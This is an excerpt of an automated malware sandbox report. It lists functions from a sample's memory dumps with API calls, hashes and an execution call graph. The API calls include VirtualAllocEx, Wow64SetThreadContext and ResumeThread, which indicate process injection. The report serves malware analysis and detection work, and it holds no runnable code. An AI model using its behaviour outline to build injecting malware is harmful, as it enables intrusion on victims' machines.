                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 39393b587e4dfe9e1cce07a2606187590fba975ac599a9bf4d639c61be8bbace
                          • Instruction ID: 23a49f7949dacdb696fd6241489f6487fa3f41879dad4fb15312a0b7935999a9
                          • Opcode Fuzzy Hash: 39393b587e4dfe9e1cce07a2606187590fba975ac599a9bf4d639c61be8bbace
                          • Instruction Fuzzy Hash: 412103B5D002089FDB10CF99D985AEEBBF5FB08310F14841AE958A3310D338A940CFA1
                          Function 0749D1D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D258
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 1ecfad65788a09867081df1d8aea083f4807cbc30038d6cb55b19d1a248686b6
                          • Instruction ID: 937fff91a4eb63627e24e82cc95298c7930d471d9f3edfa6eceffbab99f80db2
                          • Opcode Fuzzy Hash: 1ecfad65788a09867081df1d8aea083f4807cbc30038d6cb55b19d1a248686b6
                          • Instruction Fuzzy Hash: DA21E4B1D003599FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240D7799941CBA4
                          Function 0749CB18 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749CB96
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: de0ec8f92e16f3625f83113f943b12de487ab94ef8421b298f5badc12c10af97
                          • Instruction ID: f747059b46bc08e6732a7e3e5a04e70425570920110041d3ce3cd8b6fd9c5e7a
                          • Opcode Fuzzy Hash: de0ec8f92e16f3625f83113f943b12de487ab94ef8421b298f5badc12c10af97
                          • Instruction Fuzzy Hash: 7A2134B1D003098FDB10DFAAC485BEEBBF4AB48320F54842AD859A7240DB789945CFA4
                          Function 0144D908 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0144D98F
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 90bc3d31554213708d3609cfd3b93f3c3ab126853e8d734d576af8438b481c95
                          • Instruction ID: e83cb4f648023206bce92097a6158c922d35f9ce108a5f94d6e84bea691748b4
                          • Opcode Fuzzy Hash: 90bc3d31554213708d3609cfd3b93f3c3ab126853e8d734d576af8438b481c95
                          • Instruction Fuzzy Hash: 0621E4B5D002499FDB10CF9AD884ADEFBF5FB48310F14841AE954A3350D378A940CFA5
                          Function 0749D020 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D096
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e7fc62bcdb1ea4325818c346d90fbd5cffd38e19ab14558a48a9b981c04abfdd
                          • Instruction ID: 98e2cff0136bd1484981432c64f61dd6b51199518e4126df3db1c5c92cb69a55
                          • Opcode Fuzzy Hash: e7fc62bcdb1ea4325818c346d90fbd5cffd38e19ab14558a48a9b981c04abfdd
                          • Instruction Fuzzy Hash: CA113675D002499FDB20DFA9C845BDEBFF5AB48324F14841AE955A7250C7759501CFA0
                          Function 0749CA60 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 152673698d947f1f6fb6c0575f56797cfb948b89bd6dc75f2610fae1b25f5edc
                          • Instruction ID: db1a0d88802d2c894b78dce2148e638bf4e001fe16e3b756905309750a55c481
                          • Opcode Fuzzy Hash: 152673698d947f1f6fb6c0575f56797cfb948b89bd6dc75f2610fae1b25f5edc
                          • Instruction Fuzzy Hash: D11149B1C003498FDB20DFAAD8457DFFFF9AB88224F14882AD515A7640CB796541CBA4
                          Function 0749D028 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D096
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 88956e8a721e2ed3c2fcb8d022387dff17a84c9dd470d5360dd284b8bba091ca
                          • Instruction ID: 65ab34b25ed78aa6403a1dde6468c3e0f0593a24794c064a28df2a91c7140ea3
                          • Opcode Fuzzy Hash: 88956e8a721e2ed3c2fcb8d022387dff17a84c9dd470d5360dd284b8bba091ca
                          • Instruction Fuzzy Hash: 7C112675D003499FDB20DFAAC845BDEBFF5EB48320F14881AE515A7250CB759941CFA4
                          Function 075A1191 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 075A11F5
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1394019072.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_75a0000_RTdozXra.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 514a03d7e2e9819e08c23c33589af7013a01351ca8e5aa1ac543a4fe1f35fe21
                          • Instruction ID: aee9e82b57372f7be3960f08da28a7cfadb4fd1ff0e13b1530e7f1903cfa22f5
                          • Opcode Fuzzy Hash: 514a03d7e2e9819e08c23c33589af7013a01351ca8e5aa1ac543a4fe1f35fe21
                          • Instruction Fuzzy Hash: E41113BA8003499FDB20DF9AD845BDEBFF8FB48324F10841AE514A7240C375A944CFA1
                          Function 0749CA68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: cd70f584199b5fe2bb0c9ef11f4af60b4eb5a51a6a7905f7aed8b2e2404deb5b
                          • Instruction ID: 0dc44474e42c69ba4b5f5af16d53f01caefdd972c0beb7277c797ff3be1d9842
                          • Opcode Fuzzy Hash: cd70f584199b5fe2bb0c9ef11f4af60b4eb5a51a6a7905f7aed8b2e2404deb5b
                          • Instruction Fuzzy Hash: 461128B1D003498FDB20DFAAC4457DEFBF5AB88224F14882AD519A7240CB796941CBA4
                          Function 0144B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B67E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 906e7ce8e9683a2456b2266f77f8d0c5def3bf025621676a860791451b4000ba
                          • Instruction ID: 9edd7837f6278045d4d7ab4371df1c8c26c33d987b23f256ea40bfa33ba467b3
                          • Opcode Fuzzy Hash: 906e7ce8e9683a2456b2266f77f8d0c5def3bf025621676a860791451b4000ba
                          • Instruction Fuzzy Hash: D911DFB5C007498FEB20DF9AD444B9EFBF5EB88224F10842AD929A7210D379A545CFA5
                          Function 0555A2B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 4ddf30618860be42962bf243c243602614cc222e4f3d862fd1cc26ea74e84526
                          • Instruction ID: 940f470fd79425ea813ff8598b5bf16cc2e42e260dcab48b3ca5a0b530ccbe50
                          • Opcode Fuzzy Hash: 4ddf30618860be42962bf243c243602614cc222e4f3d862fd1cc26ea74e84526
                          • Instruction Fuzzy Hash: 2B019EB29003099FDF108FD9D845BDEBBF5FB88320F98851AE805A7250C779D881CB60
                          Function 075A1198 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 075A11F5
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1394019072.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_75a0000_RTdozXra.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 1965ee543da7a5bb009f20bcd7efee63f73d668465c3397a087aca6d5aa5a059
                          • Instruction ID: 1c0cbdb567f7756e13209e422a7b6ece9094055b719ccc43b60be7ac1630020e
                          • Opcode Fuzzy Hash: 1965ee543da7a5bb009f20bcd7efee63f73d668465c3397a087aca6d5aa5a059
                          • Instruction Fuzzy Hash: 7811D3B58003499FDB20DF9AD945BDEFBF8FB48320F10841AE558A7240D375A944CFA1
                          Function 011ED3D8 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 04199fe4a25b037adbc816af861cc0194afd18cfec0f335b6222ae451913e65d
                          • Instruction ID: 97647ea172e4affe2d213c50de3d2d9814b17952451fe8de9e8502636d56226e
                          • Opcode Fuzzy Hash: 04199fe4a25b037adbc816af861cc0194afd18cfec0f335b6222ae451913e65d
                          • Instruction Fuzzy Hash: 8C213671504604DFDF19DF84E9C8B56BBA5FBA4324F20C169E8090F646C336E446CBA2
                          Function 011ED4C4 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb0e7637398e6c9ec116e3f4f0425affa5c31e6783adb2f0175f48582d89389b
                          • Instruction ID: f463579abfa0f560a6e18c9f917ff47fd46daaff426de1b13d4a1b110efa9e34
                          • Opcode Fuzzy Hash: bb0e7637398e6c9ec116e3f4f0425affa5c31e6783adb2f0175f48582d89389b
                          • Instruction Fuzzy Hash: E6210671504640DFDF19DF94E9C8B26BFB5FB84318F24C569D8050B256C336D456CBA2
                          Function 011FD01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13794409a39e38d5a081b674387dec987c849dea83603539986696ae49684c8d
                          • Instruction ID: 7491c787da90909f6c42242d79ddcb8a9c79b2cf68bd7e4dc5ebed75206b259d
                          • Opcode Fuzzy Hash: 13794409a39e38d5a081b674387dec987c849dea83603539986696ae49684c8d
                          • Instruction Fuzzy Hash: C7212271604300DFDF19DF54E9C4B26BB61EB84314F20C6ADEA0A4B386C336D807CA62
                          Function 011FD1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f7a296ccc2161fb71be784f867b39864c46110953c7aee1e01cc223df27368d
                          • Instruction ID: 235df789ae218eb38418105323c4d190912505553ea39b1d7ba9c4d60edca704
                          • Opcode Fuzzy Hash: 2f7a296ccc2161fb71be784f867b39864c46110953c7aee1e01cc223df27368d
                          • Instruction Fuzzy Hash: 13210779604300DFDF19DF94E9C4B26BB65FB84324F20C56DEA494B256C336D446CAA2
                          Function 011FD006 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e97a630965075ff6fd2852d8d0032f8c24943a70e4eaf36e7529cf5c194c12e1
                          • Instruction ID: 8fdba49c0a5557d4b42ab9c2b201303bbd852304e64042943590de2d43968c35
                          • Opcode Fuzzy Hash: e97a630965075ff6fd2852d8d0032f8c24943a70e4eaf36e7529cf5c194c12e1
                          • Instruction Fuzzy Hash: B821AE755093808FCB07CF24D990B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                          Function 011ED3D3 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction ID: 504a71e13bc4a5db65144db4273cc20f3a3a9408ba528cd7f1c0fa1146dc7678
                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction Fuzzy Hash: 8111CD76504680CFCF06CF84D5C4B56BFA2FB94324F2482A9D8090A656C33AE456CBA2
                          Function 011ED4BF Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1364980196.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11ed000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction ID: 19ade1dc348b1a7f4e7d1965bbc7aab8eb57c1be8580d2d074ad2060902bb803
                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                          • Instruction Fuzzy Hash: 8111AF76504680CFCF16CF54E9C4B16BFB2FB84324F24C6A9D8490B656C336D456CBA2
                          Function 011FD1CF Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1365029097.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_11fd000_RTdozXra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                          • Instruction ID: dd30b6fd3983e5965601338168f49421bd9e6f4e628ee86a2786c56f03c41fae
                          • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                          • Instruction Fuzzy Hash: EA11BE79504240DFCB06CF54D5C0B25BB61FB84324F24C6AED9494B296C33AD40ACB92

                          Execution Graph

                          Execution Coverage:1.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:3.6%
                          Total number of Nodes:643
                          Total number of Limit Nodes:13
                          execution_graph 45803 404e06 WaitForSingleObject 45804 404e20 SetEvent CloseHandle 45803->45804 45805 404e37 closesocket 45803->45805 45806 404eb8 45804->45806 45807 404e44 45805->45807 45808 404e5a 45807->45808 45816 4050c4 83 API calls 45807->45816 45809 404e6c WaitForSingleObject 45808->45809 45810 404eae SetEvent CloseHandle 45808->45810 45817 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45809->45817 45810->45806 45813 404e7b SetEvent WaitForSingleObject 45818 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45813->45818 45815 404e93 SetEvent CloseHandle CloseHandle 45815->45810 45816->45808 45817->45813 45818->45815 45819 40163e 45820 401646 45819->45820 45821 401649 45819->45821 45822 401688 45821->45822 45825 401676 45821->45825 45827 43229f 45822->45827 45824 40167c 45826 43229f new 22 API calls 45825->45826 45826->45824 45831 4322a4 45827->45831 45829 4322d0 45829->45824 45831->45829 45834 439adb 45831->45834 45841 440480 7 API calls 2 library calls 45831->45841 45842 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45831->45842 45843 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45831->45843 45839 443649 __Getctype 45834->45839 45835 443687 45845 43ad91 20 API calls __dosmaperr 45835->45845 45836 443672 RtlAllocateHeap 45838 443685 45836->45838 45836->45839 45838->45831 45839->45835 45839->45836 45844 440480 7 API calls 2 library calls 45839->45844 45841->45831 45844->45839 45845->45838 45846 43263c 45847 432648 ___scrt_is_nonwritable_in_current_image 45846->45847 45872 43234b 45847->45872 45849 43264f 45851 432678 45849->45851 46136 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45849->46136 45858 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45851->45858 46137 441763 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 45851->46137 45853 432691 45855 432697 ___scrt_is_nonwritable_in_current_image 45853->45855 46138 441707 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 45853->46138 45856 432717 45883 4328c9 45856->45883 45858->45856 46139 4408e7 35 API calls 5 library calls 45858->46139 45867 432743 45869 43274c 45867->45869 46140 4408c2 28 API calls _Atexit 45867->46140 46141 4324c2 13 API calls 2 library calls 45869->46141 45873 432354 45872->45873 46142 4329da IsProcessorFeaturePresent 45873->46142 45875 432360 46143 436cd1 10 API calls 4 library calls 45875->46143 45877 432365 45882 432369 45877->45882 46144 4415bf 45877->46144 45879 432380 45879->45849 45882->45849 46210 434c30 45883->46210 45886 43271d 45887 4416b4 45886->45887 46212 44c239 45887->46212 45889 4416bd 45890 432726 45889->45890 46216 443d25 35 API calls 45889->46216 45892 40d3f0 45890->45892 46218 41a8da LoadLibraryA GetProcAddress 45892->46218 45894 40d40c 46225 40dd83 45894->46225 45896 40d415 46240 4020d6 45896->46240 45899 4020d6 28 API calls 45900 40d433 45899->45900 46246 419d87 45900->46246 45904 40d445 46272 401e6d 45904->46272 45906 40d44e 45907 40d461 45906->45907 45908 40d4b8 45906->45908 46278 40e609 45907->46278 45909 401e45 22 API calls 45908->45909 45911 40d4c6 45909->45911 45915 401e45 22 API calls 45911->45915 45914 40d47f 46293 40f98d 45914->46293 45916 40d4e5 45915->45916 46309 4052fe 45916->46309 45919 40d4f4 46314 408209 45919->46314 45928 40d4a3 45930 401fb8 11 API calls 45928->45930 45932 40d4ac 45930->45932 46131 4407f6 GetModuleHandleW 45932->46131 45933 401fb8 11 API calls 45934 40d520 45933->45934 45935 401e45 22 API calls 45934->45935 45936 40d529 45935->45936 46331 401fa0 45936->46331 45938 40d534 45939 401e45 22 API calls 45938->45939 45940 40d54f 45939->45940 45941 401e45 22 API calls 45940->45941 45942 40d569 45941->45942 45943 40d5cf 45942->45943 46335 40822a 28 API calls 45942->46335 45945 401e45 22 API calls 45943->45945 45950 40d5dc 45945->45950 45946 40d594 45947 401fc2 28 API calls 45946->45947 45948 40d5a0 45947->45948 45951 401fb8 11 API calls 45948->45951 45949 40d650 45955 40d660 CreateMutexA GetLastError 45949->45955 45950->45949 45952 401e45 22 API calls 45950->45952 45953 40d5a9 45951->45953 45954 40d5f5 45952->45954 46336 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45953->46336 45958 40d5fc OpenMutexA 45954->45958 45956 40d987 45955->45956 45957 40d67f 45955->45957 45961 401fb8 11 API calls 45956->45961 45999 40d9ec 45956->45999 45959 40d688 45957->45959 45960 40d68a GetModuleFileNameW 45957->45960 45963 40d622 45958->45963 45964 40d60f WaitForSingleObject CloseHandle 45958->45964 45959->45960 46339 4192ae 33 API calls 45960->46339 45985 40d99a ___scrt_fastfail 45961->45985 46337 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45963->46337 45964->45963 45966 40d5c5 45966->45943 45968 40dd0f 45966->45968 45967 40d6a0 45969 40d6f5 45967->45969 45971 401e45 22 API calls 45967->45971 46369 41239a 30 API calls 45968->46369 45973 401e45 22 API calls 45969->45973 45979 40d6bf 45971->45979 45981 40d720 45973->45981 45974 40dd22 46370 410eda 65 API calls ___scrt_fastfail 45974->46370 45976 40d63b 45976->45949 46338 41239a 30 API calls 45976->46338 45977 40dcfa 46007 40dd6a 45977->46007 46371 402073 28 API calls 45977->46371 45979->45969 45986 40d6f7 45979->45986 45993 40d6db 45979->45993 45980 40d731 45984 401e45 22 API calls 45980->45984 45981->45980 46343 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45981->46343 45992 40d73a 45984->45992 46351 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45985->46351 46341 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45986->46341 45987 40dd3a 46372 4052dd 28 API calls 45987->46372 45998 401e45 22 API calls 45992->45998 45993->45969 46340 4067a0 36 API calls ___scrt_fastfail 45993->46340 45995 40d70d 45995->45969 46342 4066a6 58 API calls 45995->46342 46003 40d755 45998->46003 46004 401e45 22 API calls 45999->46004 46009 401e45 22 API calls 46003->46009 46006 40da10 46004->46006 46352 402073 28 API calls 46006->46352 46373 413980 161 API calls _strftime 46007->46373 46012 40d76f 46009->46012 46014 401e45 22 API calls 46012->46014 46013 40da22 46353 41215f 14 API calls 46013->46353 46016 40d789 46014->46016 46020 401e45 22 API calls 46016->46020 46017 40da38 46018 401e45 22 API calls 46017->46018 46019 40da44 46018->46019 46354 439867 39 API calls _strftime 46019->46354 46023 40d7a3 46020->46023 46022 40d810 46022->45985 46029 401e45 22 API calls 46022->46029 46062 40d89f ___scrt_fastfail 46022->46062 46023->46022 46025 401e45 22 API calls 46023->46025 46024 40da51 46026 40da7e 46024->46026 46355 41aa4f 81 API calls ___scrt_fastfail 46024->46355 46034 40d7b8 _wcslen 46025->46034 46356 402073 28 API calls 46026->46356 46032 40d831 46029->46032 46030 40da70 CreateThread 46030->46026 46611 41b212 10 API calls 46030->46611 46031 40da8d 46357 402073 28 API calls 46031->46357 46036 401e45 22 API calls 46032->46036 46034->46022 46040 401e45 22 API calls 46034->46040 46035 40da9c 46358 4194da 79 API calls 46035->46358 46038 40d843 46036->46038 46044 401e45 22 API calls 46038->46044 46039 40daa1 46041 401e45 22 API calls 46039->46041 46042 40d7d3 46040->46042 46043 40daad 46041->46043 46046 401e45 22 API calls 46042->46046 46048 401e45 22 API calls 46043->46048 46045 40d855 46044->46045 46050 401e45 22 API calls 46045->46050 46047 40d7e8 46046->46047 46344 40c5ed 31 API calls 46047->46344 46049 40dabf 46048->46049 46053 401e45 22 API calls 46049->46053 46052 40d87e 46050->46052 46058 401e45 22 API calls 46052->46058 46055 40dad5 46053->46055 46054 40d7fb 46345 401ef3 28 API calls 46054->46345 46061 401e45 22 API calls 46055->46061 46057 40d807 46346 401ee9 11 API calls 46057->46346 46060 40d88f 46058->46060 46347 40b871 46 API calls _wcslen 46060->46347 46063 40daf5 46061->46063 46348 412338 31 API calls 46062->46348 46359 439867 39 API calls _strftime 46063->46359 46066 40d942 ctype 46070 401e45 22 API calls 46066->46070 46068 40db02 46069 401e45 22 API calls 46068->46069 46071 40db0d 46069->46071 46072 40d959 46070->46072 46073 401e45 22 API calls 46071->46073 46072->45999 46075 401e45 22 API calls 46072->46075 46074 40db1e 46073->46074 46360 408f1f 166 API calls _wcslen 46074->46360 46076 40d976 46075->46076 46349 419bca 28 API calls 46076->46349 46079 40d982 46350 40de34 88 API calls 46079->46350 46080 40db33 46082 401e45 22 API calls 46080->46082 46084 40db3c 46082->46084 46083 40db83 46085 401e45 22 API calls 46083->46085 46084->46083 46086 43229f new 22 API calls 46084->46086 46091 40db91 46085->46091 46087 40db53 46086->46087 46088 401e45 22 API calls 46087->46088 46089 40db65 46088->46089 46094 40db6c CreateThread 46089->46094 46090 40dbd9 46093 401e45 22 API calls 46090->46093 46091->46090 46092 43229f new 22 API calls 46091->46092 46095 40dba5 46092->46095 46099 40dbe2 46093->46099 46094->46083 46609 417f6a 101 API calls 2 library calls 46094->46609 46096 401e45 22 API calls 46095->46096 46097 40dbb6 46096->46097 46102 40dbbd CreateThread 46097->46102 46098 40dc4c 46100 401e45 22 API calls 46098->46100 46099->46098 46101 401e45 22 API calls 46099->46101 46104 40dc55 46100->46104 46103 40dbfc 46101->46103 46102->46090 46606 417f6a 101 API calls 2 library calls 46102->46606 46106 401e45 22 API calls 46103->46106 46105 40dc99 46104->46105 46108 401e45 22 API calls 46104->46108 46366 4195f8 79 API calls 46105->46366 46109 40dc11 46106->46109 46111 40dc69 46108->46111 46361 40c5a1 31 API calls 46109->46361 46110 40dca2 46367 401ef3 28 API calls 46110->46367 46116 401e45 22 API calls 46111->46116 46113 40dcad 46368 401ee9 11 API calls 46113->46368 46119 40dc7e 46116->46119 46117 40dc24 46362 401ef3 28 API calls 46117->46362 46118 40dcb6 CreateThread 46123 40dce5 46118->46123 46124 40dcd9 CreateThread 46118->46124 46607 40e18d 122 API calls 46118->46607 46364 439867 39 API calls _strftime 46119->46364 46122 40dc30 46363 401ee9 11 API calls 46122->46363 46123->45977 46126 40dcee CreateThread 46123->46126 46124->46123 46608 410b5c 137 API calls 46124->46608 46126->45977 46610 411140 38 API calls ___scrt_fastfail 46126->46610 46128 40dc39 CreateThread 46128->46098 46605 401bc9 49 API calls _strftime 46128->46605 46129 40dc8b 46365 40b0a3 7 API calls 46129->46365 46132 432739 46131->46132 46132->45867 46133 44091f 46132->46133 46613 44069c 46133->46613 46136->45849 46137->45853 46138->45858 46139->45856 46140->45869 46141->45855 46142->45875 46143->45877 46148 44cd48 46144->46148 46147 436cfa 8 API calls 3 library calls 46147->45882 46151 44cd65 46148->46151 46152 44cd61 46148->46152 46150 432372 46150->45879 46150->46147 46151->46152 46154 4475a6 46151->46154 46166 432d4b 46152->46166 46155 4475b2 ___scrt_is_nonwritable_in_current_image 46154->46155 46173 442d9a EnterCriticalSection 46155->46173 46157 4475b9 46174 44d363 46157->46174 46159 4475c8 46165 4475d7 46159->46165 46185 44743a 23 API calls 46159->46185 46162 4475d2 46186 4474f0 GetStdHandle GetFileType 46162->46186 46163 4475e8 ___scrt_is_nonwritable_in_current_image 46163->46151 46187 4475f3 LeaveCriticalSection 